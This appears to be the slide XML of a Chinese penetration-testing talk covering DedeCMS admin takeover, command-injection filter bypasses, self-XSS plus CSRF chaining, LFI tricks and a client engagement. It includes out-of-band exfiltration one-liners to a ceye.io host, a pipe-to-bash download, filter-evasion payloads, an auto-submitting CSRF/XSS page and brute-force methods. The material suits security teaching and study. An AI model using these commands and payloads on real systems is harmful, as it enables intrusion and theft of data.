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xxx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xxxx.ceye.io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xxx.ceye.io/'+$a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b.drops.wiki/drops/web-14035.html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gin.uber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cnblogs.com/iamstudy/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/l3m0n" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://weibo.com/5368508676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php://filter/convert.base64-encode/resource=index.php" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="php://filter/resource=index.php" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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l3m0n/Bypass_Disable_functions_Shell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qlmapproject/sqlmap/tree/master/udf/mysql/linux" TargetMode="Externa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qlmapproject/sqlmap/tree/master/udf/postgresql" TargetMode="Externa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8127" y="3528576"/>
            <a:ext cx="5291140" cy="2943227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13" name="Shape 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2043429" y="1473352"/>
            <a:ext cx="7914639" cy="122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8600"/>
              </a:lnSpc>
              <a:defRPr sz="6000">
                <a:solidFill>
                  <a:srgbClr val="00FA6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渗透测试中的那点小事 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10500973" y="5923774"/>
            <a:ext cx="1158138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FA66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L3m0n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90" y="1796035"/>
            <a:ext cx="12068220" cy="476826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5347975" y="4673031"/>
            <a:ext cx="8802826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可以通过注入得到$cfg_cookie_encode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select value from dede_sysconfig where varname=0x6366675F636F6F6B69655F656E636F6465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58693" y="394284"/>
            <a:ext cx="3719880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3、前台修改admin密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="149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644" y="3218874"/>
            <a:ext cx="12192001" cy="272980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197499" y="1658459"/>
            <a:ext cx="5211978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File: /member/edit_baseinfo.php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前台会员信息文件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53060" y="1605280"/>
            <a:ext cx="11885878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总结：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1、利用条件看起来极为苛刻，但是都是默认的利用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2、蜜汁尴尬点：admin不能前台登陆，但是前台的会员中心又写了update管理员密码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591958" y="358223"/>
            <a:ext cx="6032555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0x03 命令执行绕过姿势</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Shape 155"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="388516" y="1804325"/>
            <a:ext cx="1980996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先上小密圈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一个提问</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="156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8696" y="1293513"/>
            <a:ext cx="8683471" cy="557664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303427" y="3469635"/>
            <a:ext cx="3403396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代码解读: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处理文件上传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其中文件扩展名可控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进入到del_cmd中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不能使用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. / \ </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>字符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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Shape 158"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3686292" y="4382670"/>
            <a:ext cx="4487514" cy="210429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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18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6003" y="2864862"/>
            <a:ext cx="5279218" cy="396882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339894" y="1690938"/>
            <a:ext cx="10097211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问题剖析：不能使用 .  \   / 字符的命令，拓展到其他环境的来说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1、没法直接写一句话，echo aaa &gt; 1</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:t>php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2、base64编码不太好使，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:t>的存在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3、远程下载，wget http:</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rP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913620" y="2970528"/>
            <a:ext cx="4193539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600"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如何突破？？？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70849" y="1646304"/>
            <a:ext cx="5923889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1、编码绕过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问题1和问题2是因为会出现敏感字符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编码</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>就是可以避免敏感字符的出现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base64不行，我就用</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxd (16进制)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF2600"/>
              </a:solidFill>
            </a:endParaR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编码: echo "hello" | xxd -p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解码: echo "68656c6c6f0a" | xxd -r -p</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="Shape 166"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="790979">
            <a:off x="6819303" y="3059722"/>
            <a:ext cx="4341469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自我扩展一下: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还有哪些工具可以使用???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win03\win7测试有</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>certutil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290708" y="1646303"/>
            <a:ext cx="11610583" cy="4164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2、远程内容绕过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当然如果可以获取到远程的内容，比如curl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http://xxx/</a:t>
            </a:r>
            <a:r>
              <a:t> | bash，这样能够省心很多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在SSRF漏洞利用中，经常会使用到将IP地址转化为进制来突破限制。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八、十、十六进制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比如八进制：117.103.205.232     &lt;====&gt;    016531746750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740" y="1420612"/>
            <a:ext cx="6222620" cy="107751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315584" y="2910479"/>
            <a:ext cx="8548623" cy="344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$site = @$argv[1];</a:t>
            </a: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$ipArr = explode('.', $site);</a:t>
            </a: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$hexip = "";</a:t>
            </a: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foreach ($ipArr as $value) {</a:t>
            </a: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      $hexip .= </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base_convert($value, 10, 16)</a:t>
            </a:r>
            <a:r>
              <a:t>;</a:t>
            </a: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}</a:t>
            </a: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echo "八进制1：http://0" . </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>base_convert($hexip, 16, 8)</a:t>
            </a:r>
            <a:r>
              <a:t> . “\n\r";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="172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6626" y="1412039"/>
            <a:ext cx="5493294" cy="4394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0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443229" y="5351779"/>
            <a:ext cx="11210238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这里存在一个坑点就是：Apache没法理解这样的主机头，出现400错误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我使用的是用flask来避免这个错误</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175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481" y="1399979"/>
            <a:ext cx="9840919" cy="3830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39443" y="441324"/>
            <a:ext cx="3495678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17" name="Shape 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880383" y="1930260"/>
            <a:ext cx="4114952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1、自我介绍 &amp;&amp; 前言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2、dedecms阉割进后台 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3、命令执行绕过姿势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4、self-xss + csrf的利用 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5、LFI姿势 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6、某次项目过程分享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1243328" y="2303778"/>
            <a:ext cx="97053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总结：从上面的问题来看，其中关键在于如何避免遇到敏感词</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Shape 178"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2340610" y="3395979"/>
            <a:ext cx="6377939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下面就来分享一下更多小技巧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94029" y="1617980"/>
            <a:ext cx="7157110" cy="466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1、巧借东风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借用其他文件中的值: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截取环境变量的值(来自小密圈me7ell的分享)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Windows：%comspec:~a,b%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Linux：${PATH:a:b}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其中a表示从a位开始，b表示长度</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181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1286" y="1501444"/>
            <a:ext cx="7372227" cy="248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2712" y="4933824"/>
            <a:ext cx="5615888" cy="1682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9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2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494029" y="1630678"/>
            <a:ext cx="11029238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2、利用HTTP、DNS通道(无回显的命令执行)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Windows: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for /F %x in ('whoami') do start http://xxx.ceye.io/%x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for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.ceye.io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Linux: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curl http://xxxx.ceye.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`whoami`</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF2600"/>
              </a:solidFill>
            </a:endParaR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ping -c 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>`whoami`</a:t>
            </a:r>
            <a:r>
              <a:t>.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xxxx.ceye.io</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Shape 185"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21017891">
            <a:off x="6120128" y="4373880"/>
            <a:ext cx="5892596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问题：获取的字符往往是千奇百怪的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比如空格，如何才能稳稳的开车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获取到字符呢?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  <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="185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34416" y="1516440"/>
            <a:ext cx="11319968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利用编码(base64)开车不会翻！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Windows(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:t>)：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for /F %x in ('</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:t>') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%x'));$b=New-Object System.Net.WebClient;$b.DownloadString(‘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http://xxx.ceye.io/'+$a</a:t>
            </a:r>
            <a:r>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Shape 188"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341628" y="5123179"/>
            <a:ext cx="5635142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Linux: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curl http://xxxx.ceye.io/</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$(id|base64)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05354" y="1503741"/>
            <a:ext cx="5381243" cy="5171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3、突破黏人的限制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Linux：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无空格的时候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echo</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>${IFS}</a:t>
            </a:r>
            <a:r>
              <a:t>aaaa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执行ls命令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a=l;b=s;$a$b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cat hello文件内容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a=c;b=at;c=he;d=llo;$a$b ${c}${d}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191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0451" y="2346115"/>
            <a:ext cx="5156549" cy="978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9187" y="3709989"/>
            <a:ext cx="6830514" cy="758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91077" y="4701790"/>
            <a:ext cx="6310935" cy="1419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  <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="193" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="192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354329" y="347978"/>
            <a:ext cx="6112702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0x04 Self-Xss + Csrf的组合拳</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Shape 196"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582929" y="1478278"/>
            <a:ext cx="11026142" cy="466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Self-Xss：存在用户自己账户的xss，</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无法影响到其他用户???</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF2600"/>
              </a:solidFill>
            </a:endParaR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可以说是极为鸡肋的漏洞，一般src里面也给不了多高的分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但是！结合一下CSRF就能发挥更多的威力！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来一个简单的DEMO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30529" y="1516379"/>
            <a:ext cx="5548223" cy="291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600"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index.php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session_start();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if (isset($_POST['c'])) {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	$_SESSION['c'] = $_POST['c'];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}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echo $_SESSION['c'];</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Shape 199"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5637529" y="4361179"/>
            <a:ext cx="6503415" cy="244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600"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index.html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&lt;form action="index.php" method="POST"&gt;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&lt;input type="text" name="c"&gt; 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&lt;input type="submit" value="submit"&gt;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&lt;/form&gt;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500380" y="1554480"/>
            <a:ext cx="10565992" cy="374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300"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exp.html：管理员访问的时候，可以直接弹框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&lt;html&gt;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  &lt;form action="http://lemon.love/test/csrf/6-xss-csrf/index.php" method="post"&gt;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    &lt;input type="text" name="c" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(/lemon/)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:t>"&gt; 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  &lt;/form&gt;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  &lt;script&gt;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      </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.forms[0].submit();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  &lt;/script&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="202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6956" y="3704571"/>
            <a:ext cx="5278694" cy="314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642486" y="1452879"/>
            <a:ext cx="10907028" cy="263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超级经典的案例：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Uber三个鸡肋漏洞的妙用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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http://cb.drops.wiki/drops/web-14035.html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这案例总结一句话就是：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Shape 205"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646429" y="4894579"/>
            <a:ext cx="7619390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存在自己账户中的xss，影响到其他用户</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(有巧合)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563880" y="1490979"/>
            <a:ext cx="11064241" cy="51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情景描述：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1、设置个人信息的页面存在存储型xss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OAuth登录流程：</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1、用户访问Uber某个需要登录的网站，比如partners.uber.com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2、用户被重定向到授权服务器，比如login.uber.com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3、用户输入账号密码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4、用户</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>重定向回到partners.uber.com</a:t>
            </a:r>
            <a:r>
              <a:t>，同时URL中携带code，可以用来换取Access Token</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF2600"/>
              </a:solidFill>
            </a:endParaR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5、访问</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/logout</a:t>
            </a:r>
            <a:r>
              <a:t>会清除用户partner.uber.com的session，然后再重定向到login.uber.com的退出登录页面，清除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login.uber.com</a:t>
            </a:r>
            <a:r>
              <a:t>的session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39443" y="441324"/>
            <a:ext cx="3495678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0x01 自我介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Shape 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753914" y="1705095"/>
            <a:ext cx="747966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ID：L3m0n（柠檬草）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Shape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="811504" y="4416521"/>
            <a:ext cx="6726123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BLOG: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http://www.cnblogs.com/iamstudy/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Shape 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825032" y="5222347"/>
            <a:ext cx="5387644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GITHUB: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https://github.com/l3m0n</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Shape 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775838" y="2650550"/>
            <a:ext cx="6076086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渗透爱好者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Syclover(三叶草安全小组)技术负责人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CTFer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Shape 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802304" y="6028175"/>
            <a:ext cx="6251752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WEIBO：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http://weibo.com/5368508676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513181" y="1579878"/>
            <a:ext cx="11165638" cy="466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攻击思路：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1、让用户</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>登出partner.uber.com</a:t>
            </a:r>
            <a:r>
              <a:t>，但是不要登出login.uber.com，这样后面可以让用户重新回到原有账号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2、让</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>用户登录我们的账号</a:t>
            </a:r>
            <a:r>
              <a:t>，这样payload就会执行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3、用户登录自己的账号，但是我们的payload仍然在运行，这样就可以盗取信息了</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="Shape 210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2075178" y="3205478"/>
            <a:ext cx="10072877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&lt;meta http-equiv="Content-Security-Policy" content="</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img-src https://partners.uber.com</a:t>
            </a:r>
            <a:r>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="20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&lt;img src="https://partners.uber.com/logout/"&gt;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240278" y="4729479"/>
            <a:ext cx="2599943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/oauth/callback?code=</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Shape 212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351785" y="5999479"/>
            <a:ext cx="7488427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两个iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，第一个是退出我们的账号，第二个是</a:t>
            </a:r>
            <a:r>
              <a:t>登陆用户的账号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2000"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iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是同源，可获取到用户信息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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="212" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="21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17830" y="347978"/>
            <a:ext cx="2797556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0x05 LFI姿势</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Shape 215"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430530" y="1694179"/>
            <a:ext cx="11156072" cy="263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当遇上一个LFI漏洞的时候，你会怎么样做？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读取配置文件、源码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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php://filter/convert.base64-encode/resource=index.php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利用php伪协议的filter过滤器对php源码进行base64编码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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php://filter/resource=index.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="216" name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807" y="4585970"/>
            <a:ext cx="9230994" cy="2175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08330" y="1516378"/>
            <a:ext cx="11381741" cy="466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关注各类服务的log文件：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/var/log/httpd/access.log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/var/log/auth.log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…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默认是有权限问题，包含不了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php的session文件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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="219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0569" y="4408547"/>
            <a:ext cx="8611431" cy="2472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576580" y="1440179"/>
            <a:ext cx="11038841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Tmp File Include：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php默认对enctype=“multipart/form-data"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上传的时候都会在tmp目录下生成一个临时文件，内容就是我们上传的内容，但</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>很快就会被删除</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="222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691" y="2093069"/>
            <a:ext cx="10438359" cy="79226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737310" y="5008879"/>
            <a:ext cx="10717377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对</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>任意的php</a:t>
            </a:r>
            <a:r>
              <a:t>进行文件上传操作，可以生成一个shell内容的临时文件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但是文件名咋知道？！！！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449580" y="1440180"/>
            <a:ext cx="17932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1、phpinfo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="226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754" y="2276237"/>
            <a:ext cx="11358492" cy="2305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75" y="2500702"/>
            <a:ext cx="10992050" cy="4165528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525780" y="1567180"/>
            <a:ext cx="3153764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2、Windows通配符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639443" y="441324"/>
            <a:ext cx="6032556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0x06 某次项目过程分享</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Shape 232"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582769" y="1698903"/>
            <a:ext cx="11026462" cy="466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目标：中小型公司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安全评估测试关键突破点：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1、Mail爆破拿到VPN地址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2、内网渗透撸下SVN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3、POWERSHELL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4、Nginx解析漏洞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5、Bypass Disabled Functions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6、Linux下的UDF提权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450125" y="1605280"/>
            <a:ext cx="11563364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先找到</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>兄弟域名</a:t>
            </a:r>
            <a:r>
              <a:t>，顺带的得到公司的一个邮箱服务地址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兄弟域名：whois信息同注册邮箱域名，这种查询到的域名与企业也极可能存在关系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用户名(中国人名拼音top) + 弱口令top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494130" y="411480"/>
            <a:ext cx="412348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1、Mail爆破拿到VPN地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Shape 236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="392089">
            <a:off x="6412821" y="3522251"/>
            <a:ext cx="5387339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很容易将渗透目标弄偏！！！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00" y="1498038"/>
            <a:ext cx="8145800" cy="528376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8412480" y="2875278"/>
            <a:ext cx="3660139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分析一下人员情况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职务、常用密码</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等信息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11479" y="424180"/>
            <a:ext cx="349371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2、内网渗透撸下SVN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Shape 242"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449579" y="1567178"/>
            <a:ext cx="11095675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公司使用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>禅道系统</a:t>
            </a:r>
            <a:r>
              <a:t>(最新版本)进行项目、产品管理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曾在邮箱中翻到一些系统的账号，</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>密码很简单！！！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</p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="243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431" y="3297151"/>
            <a:ext cx="3291616" cy="338304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5326379" y="4500879"/>
            <a:ext cx="5374131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猜到最高权限账号密码：root/root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  <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="24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639443" y="441324"/>
            <a:ext cx="6032556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0x02 dedecms阉割进后台 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Shape 127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399995" y="1740317"/>
            <a:ext cx="11562637" cy="466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这是某次CTF遇到的题目，用于此次分享主要的是觉得技巧需要灵活利用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情景：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1、dedecms 5.6(老版本)，可注入出管理员md5，但</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2603"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不可解密</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF2603"/>
              </a:solidFill>
            </a:endParaR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2、默认后台地址，前台可注册会员，但是会员功能</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2F38"/>
                </a:solidFill>
              </a:rPr>
              <a:t>阉割</a:t>
            </a:r>
            <a:r>
              <a:t>十分严重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3、网上的一些GetShell姿势并不能获取shell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提示：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利用dedecms</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FF2600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>现成功能</a:t>
            </a:r>
            <a:r>
